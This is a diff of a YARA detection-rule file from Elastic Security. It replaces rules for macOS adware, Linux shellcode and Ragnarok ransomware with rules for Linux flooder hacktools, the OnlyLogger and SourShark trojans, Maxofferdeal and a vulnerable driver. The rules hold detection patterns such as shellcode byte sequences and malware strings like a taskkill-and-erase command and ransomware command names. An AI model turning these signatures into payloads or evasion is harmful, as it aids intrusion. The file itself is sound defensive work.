: FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_53Bf4E37 : FILE MEMORY { meta: - description = "Detects Macos Trojan Amcleaner (MacOS.Trojan.Amcleaner)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "a91d3907-5e24-46c0-90ef-ed7f46ad8792" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Amcleaner.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dc9c700f3f6a03ecb6e3f2801d4269599c32abce7bc5e6a1b7e6a64b0e025f58" - logic_hash = "e61ceea117acf444a6b137b93d7c335c6eb8a7e13a567177ec4ea44bf64fd5c6" + id = "53bf4e37-e043-4cf2-ad2a-bc63d69585ae" + date = "2021-06-28" + modified = "2021-09-16" + reference = "101f2240cd032831b9c0930a68ea6f74688f68ae801c776c71b488e17bc71871" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L560-L578" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "d1aabf8067b74dac114e197722d51c4bbb9a78e6ba9b5401399930c29d55bdcc" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "c020567fde77a72d27c9c06f6ebb103f910321cc7a1c3b227e0965b079085b49" - severity = 100 + fingerprint = "83e804640b0848caa532dadc33923c226a34e0272457bde00325069ded55f256" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 40 22 4E 53 49 6D 61 67 65 56 69 65 77 22 2C 56 69 6E 6E 76 63 6A 76 64 69 5A } + $a = { 74 00 49 50 5F 48 44 52 49 4E 43 4C 00 57 68 61 74 20 74 68 65 20 } condition: all of them } -rule ELASTIC_Macos_Trojan_Amcleaner_8Ce3Fea8 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_50158A6E : FILE MEMORY { meta: - description = "Detects Macos Trojan Amcleaner (MacOS.Trojan.Amcleaner)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "8ce3fea8-3cc7-4c59-b07c-a6dda0bb6b85" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Amcleaner.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c85bf71310882bc0c0cf9b74c9931fd19edad97600bc86ca51cf94ed85a78052" - logic_hash = "08c4b5b4afefbf1ee207525f9b28bc7eed7b55cb07f8576fddfa0bbe95002769" + id = "50158a6e-d412-4e37-a8b5-c7c79a2a5393" + date = "2021-06-28" + modified = "2021-09-16" + reference = "1e0cdb655e48d21a6b02d2e1e62052ffaaec9fdfe65a3d180fc8afabc249e1d8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L580-L598" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "67c22fcf514a3e8c2c27817798c796aacf00ba82e1090894aa2c1170a1e2a096" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e156d3c7a55cae84481df644569d1c5760e016ddcc7fd05d0f88fa8f9f9ffdae" - severity = 100 + fingerprint = "f6286d1fd84aad72cdb8c655814a9df1848fae94ae931ccf62187c100b27a349" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 54 40 22 4E 53 54 61 62 6C 65 56 69 65 77 22 2C 56 69 6E 6E 76 63 6B 54 70 51 } + $a = { 45 F8 48 01 D0 48 89 45 D8 0F B7 45 E6 48 8D 50 33 48 8B 45 F8 48 } condition: all of them } -rule ELASTIC_Linux_Shellcode_Generic_5669055F : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_F454Ec10 : FILE MEMORY { meta: - description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "5669055f-8ce7-4163-af06-cb265fde3eef" - date = "2021-04-06" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Shellcode_Generic.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "87ef4def16d956cdfecaea899cbb55ff59a6739bbb438bf44a8b5fec7fcfd85b" - logic_hash = "735b8dc7fff3c9cc96646a4eb7c5afd70be19dcc821e9e26ce906681130746be" + id = "f454ec10-7a67-4717-9e95-fecb7c357566" + date = "2022-01-05" + modified = "2022-01-26" + reference = "0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L600-L618" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "e5afb215632ad6359ba95df86316d496ea5e36edb79901c34e0710a6bd9c97d1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "616fe440ff330a1d22cacbdc2592c99328ea028700447724d2d5b930554a22f4" - severity = 100 + fingerprint = "2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 00 31 C0 31 DB 31 C9 B0 17 CD 80 31 C0 51 B1 06 } + $a = { 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B } condition: all of them } -rule ELASTIC_Linux_Shellcode_Generic_D2C96B1D : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_9417F77B : FILE MEMORY { meta: - description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "d2c96b1d-f424-476c-9463-dd34a1da524e" - date = "2021-04-06" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Shellcode_Generic.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "403d53a65bd77856f7c565307af5003b07413f2aba50869655cdd88ce15b0c82" - logic_hash = "33d964e22c8e3046f114e8264d18e8b4a0e7b55eca59151b084db7eea07aa0b1" + id = "9417f77b-190b-4834-b57a-08a7cbfac884" + date = "2022-01-05" + modified = "2022-01-26" + reference = "60ff13e27dad5e6eadb04011aa653a15e1a07200b6630fdd0d0d72a9ba797d68" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L620-L638" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "470b7e44cd875b1f6abcfa5e4d33d2808a65630dc914b38643c9efb14db5f1ff" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ee042895d863310ff493fdd33721571edd322e764a735381d236b2c0a7077cfa" - severity = 100 + fingerprint = "d321ea7aeb293f8f50236bddeee99802225b70e8695bb3527a89beea51e3ffb3" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 89 E1 8D 54 24 04 5B B0 0B CD 80 31 C0 B0 01 31 } + $a = { 0F B7 45 F6 0F B7 C0 48 01 C3 48 89 DA 48 C1 FA 10 0F B7 C3 48 8D } condition: all of them } -rule ELASTIC_Linux_Shellcode_Generic_30C70926 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Onlylogger_B9E88336 : FILE MEMORY { meta: - description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" + description = "Detects Windows Trojan Onlylogger (Windows.Trojan.OnlyLogger)" author = "Elastic Security" - id = "30c70926-9414-499a-a4db-7c3bb902dd82" - date = "2021-04-06" - modified = "2021-09-16" + id = "b9e88336-9719-4f43-afc9-b0e6c7d72b6f" + date = "2022-03-22" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Shellcode_Generic.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a742e23f26726293b1bff3db72864471d6bb4062db1cc6e1c4241f51ec0e21b1" - logic_hash = "3594994a911e5428198c472a51de189a6be74895170581ec577c49f8dbb9167a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_OnlyLogger.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "69876ee4d89ba68ee86f1a4eaf0a7cb51a012752e14c952a177cd5ffd8190986" + logic_hash = "b8d1c4c1e33fc0b54a62f82b8f53c9a1b051ad8c2f578d2a43f504158d1d9247" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4af586211c56e92b1c60fcd09b4def9801086fbe633418459dc07839fe9c735a" + fingerprint = "5c8c98b250252d178c8dbad60bf398489d9396968e33b3e004219a4f323eeed8" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E3 52 53 89 E1 31 C0 B0 0B CD 80 31 C0 40 CD 80 } + $a1 = "C:\\Users\\Ddani\\source\\repos\\onlyLogger\\Release\\onlyLogger.pdb" ascii fullword + $b1 = "iplogger.org" ascii fullword + $b2 = "NOT elevated" ascii fullword + $b3 = "WinHttpSendRequest" ascii fullword condition: - all of them + 1 of ($a*) or all of ($b*) } -rule ELASTIC_Linux_Shellcode_Generic_224Bdcc4 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Onlylogger_Ec14D5F2 : FILE MEMORY { meta: - description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" + description = "Detects Windows Trojan Onlylogger (Windows.Trojan.OnlyLogger)" author = "Elastic Security" - id = "224bdcc4-4b38-44b5-96c6-d3b378628fa4" - date = "2021-01-12" - modified = "2021-09-16" + id = "ec14d5f2-5716-47f3-a7fb-98ec2d8679d1" + date = "2022-03-22" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Shellcode_Generic.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bd22648babbee04555cef52bfe3e0285d33852e85d254b8ebc847e4e841b447e" - logic_hash = "8c4a2bb63f0926e7373caf0a027179b4730cc589f9af66d2071e88f4165b0f73" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_OnlyLogger.yar#L24-L46" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f45adcc2aad5c0fd900df4521f404bc9ca71b01e3378a5490f5ae2f0c711912e" + logic_hash = "2838851a5e013705b64625801d2ab1d56cfc17c52f75a5fd71448cb0a4b4b683" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e23b239775c321d4326eff2a7edf0787116dd6d8a9e279657e4b2b01b33e72aa" + fingerprint = "c69da3dfe0a464665759079207fbc0c82e690d812b38c83d3f4cd5998ecee1ff" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 89 E6 6A 10 5A 6A 2A 58 0F 05 48 85 C0 79 1B 49 FF C9 74 22 } + $a1 = "KILLME" ascii fullword + $a2 = "%d-%m-%Y %H" ascii fullword + $a3 = "/c taskkill /im \"" ascii fullword + $a4 = "\" /f & erase \"" ascii fullword + $a5 = "/info.php?pub=" ascii fullword condition: all of them } -rule ELASTIC_Linux_Shellcode_Generic_99B991Cd : FILE MEMORY +rule ELASTIC_Macos_Virus_Maxofferdeal_53Df500F : FILE MEMORY { meta: - description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" + description = "Detects Macos Virus Maxofferdeal (MacOS.Virus.Maxofferdeal)" author = "Elastic Security" - id = "99b991cd-a5ca-475c-8c10-e43b9d22d26e" - date = "2021-04-06" - modified = "2021-09-16" + id = "53df500f-3add-4d3d-aec3-35b7b5aa5b35" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Shellcode_Generic.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "954b5a073ce99075b60beec72936975e48787bea936b4c5f13e254496a20d81d" - logic_hash = "664e213314fe1d6f1920de237ebea3a94f7fbc42eff089475674ccef812f0f68" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Virus_Maxofferdeal.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ecd62ef880da057726ca55c6826ce4e1584ec6fc3afaabed7f66154fc39ffef8" + logic_hash = "ed63c14e31c200f906b525c7ef1cd671511a89c8833cfa1a605fc9870fe91043" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ed904a3214ccf43482e3ddf75f3683fea45f7c43a2f1860bac427d7d15d8c399" + fingerprint = "2f41de7b8e55ef8db39bf84c0f01f8d34d67b087769b84381f2ccc3778e13b08" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 6E 89 E3 50 53 89 E1 B0 0B CD 80 00 4C 65 6E 67 } + $a = { BF BF BF E6 AF A7 A7 AF A4 AD E6 AB A7 A5 C8 AC AD AE A9 BD A4 BC 97 } condition: all of them } -rule ELASTIC_Linux_Shellcode_Generic_24B9Aa12 : FILE MEMORY +rule ELASTIC_Macos_Virus_Maxofferdeal_F4681Eba : FILE MEMORY { meta: - description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" + description = "Detects Macos Virus Maxofferdeal (MacOS.Virus.Maxofferdeal)" author = "Elastic Security" - id = "24b9aa12-92b2-492d-9a0e-078cdab5830a" - date = "2021-04-06" - modified = "2021-09-16" + id = "f4681eba-20f5-4e92-9f99-00cd57412c45" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Shellcode_Generic.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "24b2c1ccbbbe135d40597fbd23f7951d93260d0039e0281919de60fa74eb5977" - logic_hash = "4685253eb00a21d6dd6e874ff68209f20c8668262f24767086687555ccf934aa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Virus_Maxofferdeal.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ecd62ef880da057726ca55c6826ce4e1584ec6fc3afaabed7f66154fc39ffef8" + logic_hash = "cf478ec5313b40d74d110e4d6e97da5f671d5af331adc3ab059a69616e78c76c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0ded0ad2fdfff464bf9a0b5a59b8edfe1151a513203386daae6f9f166fd48e5c" + fingerprint = "b6663c326e9504510b804bd9ff0e8ace5d98826af2bb2fa2429b37171b7f399d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 6E 89 E3 89 C1 89 C2 B0 0B CD 80 31 C0 40 CD 80 } + $a = { BA A4 C8 BF BF BF E6 AF A7 A7 AF A4 AD E6 AB A7 A5 C8 AC AD AE A9 BD A4 BC 97 } condition: all of them } -rule ELASTIC_Linux_Shellcode_Generic_8Ac37612 : FILE MEMORY +rule ELASTIC_Macos_Virus_Maxofferdeal_4091E373 : FILE MEMORY { meta: - description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" + description = "Detects Macos Virus Maxofferdeal (MacOS.Virus.Maxofferdeal)" author = "Elastic Security" - id = "8ac37612-aec8-4376-8269-2594152ced8a" - date = "2021-04-06" - modified = "2021-09-16" + id = "4091e373-c3a9-41c8-a1d8-3a77585ff850" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Shellcode_Generic.yar#L121-L139" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c199b902fa4b0fcf54dc6bf3e25ad16c12f862b47e055863a5e9e1f98c6bd6ca" - logic_hash = "c0af751bc54dcd9cf834fa5fe9fa120be5e49a56135ebb72fd6073948e956929" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Virus_Maxofferdeal.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c38c4bdd3c1fa16fd32db06d44d0db1b25bb099462f8d2936dbdd42af325b37c" + logic_hash = "ce82f6d3a2e4b7ffe7010629bf91a9144a94e50513682a6c0622603d28248d51" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "97a3d3e7ff4c9ae31f71e609d10b3b848cb0390ae2d1d738ef53fd23ff0621bc" + fingerprint = "3d8e7db6c39286d9626c6be8bfb5da177a6a4f8ffcec83975a644aaac164a8c7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 89 E3 ?? 53 89 E1 B0 0B CD 80 00 47 43 43 3A } + $a = { B8 F2 E7 E7 BF BF BF E6 AF A7 A7 AF A4 AD E6 AB A7 A5 C8 8B 8E 8A BD A6 AC A4 } condition: all of them } -rule ELASTIC_Linux_Shellcode_Generic_932Ed0F0 : FILE MEMORY +rule ELASTIC_Macos_Virus_Maxofferdeal_20A0091E : FILE MEMORY { meta: - description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" + description = "Detects Macos Virus Maxofferdeal (MacOS.Virus.Maxofferdeal)" author = "Elastic Security" - id = "932ed0f0-bd43-4367-bcc3-ecd8f65b52ee" - date = "2021-04-06" - modified = "2021-09-16" + id = "20a0091e-a3ef-4a13-ba92-700f3583e06d" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Shellcode_Generic.yar#L141-L159" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f357597f718f86258e7a640250f2e9cf1c3363ab5af8ddbbabb10ebfa3c91251" - logic_hash = "20ae3f1d96f8afd0900ac919eacaff3bd748a7466af5bb2b9f77cfdc4b8b829e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Virus_Maxofferdeal.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b00a61c908cd06dbc26bee059ba290e7ce2ad6b66c453ea272c7287ffa29c5ab" + logic_hash = "bb90b7e1637fd86e91763b4801a0b3bb8a1b956f328d07e96cf1b26e42b1931b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7aa4619d2629b5d795e675d17a6e962c6d66a75e11fa884c0b195cb566090070" + fingerprint = "1629b34b424816040066122592e56e317b204f3d5de2f5e7f68114c7a48d99cb" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { E3 50 89 E2 53 89 E1 B0 0B CD 80 31 C0 40 CD 80 } + $a = { F2 E7 E7 BF BF BF E6 AF A7 A7 AF A4 AD E6 AB A7 A5 C8 A0 BC BC B8 F2 E7 E7 BF } condition: all of them } -rule ELASTIC_Windows_Ransomware_Ragnarok_1Cab7Ea1 : BETA FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Winflash_881758Da : FILE { meta: - description = "Identifies RAGNAROK ransomware" + description = "Detects Windows Vulndriver Winflash (Windows.VulnDriver.WinFlash)" author = "Elastic Security" - id = "1cab7ea1-8d26-4478-ab41-659c193b5baa" - date = "2020-05-03" - modified = "2021-08-23" - reference = "https://twitter.com/malwrhunterteam/status/1256263426441125888?s=20" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Ragnarok.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8bae3ea4304473209fc770673b680154bf227ce30f6299101d93fe830da0fe91" + id = "881758da-760c-4c50-81f2-8bd698972ba2" + date = "2022-04-04" + modified = "2022-04-04" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_WinFlash.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026" + logic_hash = "a46ac1f19ba5d9543c88434575870b61fbb935cd4c4e28cb80a077502af7d2db" score = 75 - quality = 73 - tags = "BETA, FILE, MEMORY" - fingerprint = "e2a8eabb08cb99c4999e05a06d0d0dce46d7e6375a72a6a5e69d718c3d54a3ad" - threat_name = "Windows.Ransomware.Ragnarok" - severity = 100 + quality = 75 + tags = "FILE" + fingerprint = "1c64ee1c3fc6bf93e207810a473367c404c824d0eaba15910b00016e23d53637" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $c1 = ".ragnarok" ascii wide fullword + $str1 = "\\WinFlash64.pdb" condition: - 1 of ($c*) + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Windows_Ransomware_Ragnarok_7E802F95 : BETA FILE MEMORY +rule ELASTIC_Windows_Trojan_Sourshark_F0247Cce : FILE MEMORY { meta: - description = "Identifies RAGNAROK ransomware" + description = "Detects Windows Trojan Sourshark (Windows.Trojan.SourShark)" author = "Elastic Security" - id = "7e802f95-964e-4dd9-a5d1-13a6cd73d750" - date = "2020-05-03" - modified = "2021-08-23" - reference = "https://twitter.com/malwrhunterteam/status/1256263426441125888?s=20" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Ragnarok.yar#L22-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8f293cdbdc3c395e18c304dfa43d0dcdb52b18bde5b5d084190ceec70aea6cbd" + id = "f0247cce-b983-41a1-9118-fd4c23e3d099" + date = "2024-06-04" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SourShark.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "07eb88c69437ee6e3ea2fbab5f2fbd8e846125d18c1da7d72bb462e9d083c9fc" + logic_hash = "0c5d802b5bfc771bdf5df541b18c7ab9de4f420fd3928bfd85b1a71cca2af1bc" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "c62b3706a2024751f1346d0153381ac28057995cf95228e43affc3d1e4ad0fad" - threat_name = "Windows.Ransomware.Ragnarok" + tags = "FILE, MEMORY" + fingerprint = "174d6683890b855a06c672423b4a0b3aa291558d8a2af4771b931d186ce3cb63" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -66103,29 +66984,30 @@ rule ELASTIC_Windows_Ransomware_Ragnarok_7E802F95 : BETA FILE MEMORY os = "windows" strings: - $d1 = { 68 04 94 42 00 FF 35 A0 77 43 00 } - $d2 = { 68 90 94 42 00 FF 35 A0 77 43 00 E8 8F D6 00 00 8B 40 10 50 } + $a1 = "%s\\svchost.%s" + $a2 = "crypto_domain" + $a3 = "postback_id" condition: - 1 of ($d*) + all of them } -rule ELASTIC_Windows_Ransomware_Ragnarok_Efafbe48 : BETA FILE MEMORY +rule ELASTIC_Windows_Trojan_Sourshark_Adee8A17 : FILE MEMORY { meta: - description = "Identifies RAGNAROK ransomware" + description = "Detects Windows Trojan Sourshark (Windows.Trojan.SourShark)" author = "Elastic Security" - id = "efafbe48-7740-4c21-b585-467f7ad76f8d" - date = "2020-05-03" - modified = "2021-08-23" - reference = "https://twitter.com/malwrhunterteam/status/1256263426441125888?s=20" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Ragnarok.yar#L44-L71" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "c9d203620e0e6e04d717595ca70a5e5efa74abfc11e4e732d729caab2d246c27" + id = "adee8a17-cc0c-40b8-9ee6-a01b41e9befd" + date = "2024-06-04" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SourShark.yar#L23-L41" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "07eb88c69437ee6e3ea2fbab5f2fbd8e846125d18c1da7d72bb462e9d083c9fc" + logic_hash = "98a4d31849a1828c2154b5032a81580f5dcc8d4a65b96dea3a727e2a82a51666" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "a1535bc01756ac9e986eb564d712b739df980ddd61cfde5a7b001849a6b07b57" - threat_name = "Windows.Ransomware.Ragnarok" + tags = "FILE, MEMORY" + fingerprint = "f35ebe8a220693ef6288efae0d325c3f40e70836c088599cb9b620c59fab09da" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -66133,217 +67015,177 @@ rule ELASTIC_Windows_Ransomware_Ragnarok_Efafbe48 : BETA FILE MEMORY os = "windows" strings: - $a1 = "cmd_firewall" ascii fullword - $a2 = "cmd_recovery" ascii fullword - $a3 = "cmd_boot" ascii fullword - $a4 = "cmd_shadow" ascii fullword - $a5 = "readme_content" ascii fullword - $a6 = "readme_name" ascii fullword - $a8 = "rg_path" ascii fullword - $a9 = "cometosee" ascii fullword - $a10 = "&prv_ip=" ascii fullword + $a = { 8B 45 08 8B 4C BE 08 8A 04 02 02 C3 02 C1 0F B6 D8 8B 44 9E 08 89 44 BE 08 8D 42 01 33 D2 89 4C 9E 08 47 83 F8 20 0F 4C D0 81 FF 00 01 00 00 7C CF 8B 16 33 FF 8B 5E 04 39 7D FC 7E 33 0F 1F 00 } condition: - 6 of ($a*) + all of them } -rule ELASTIC_Windows_Ransomware_Ragnarok_5625D3F6 : BETA FILE MEMORY +rule 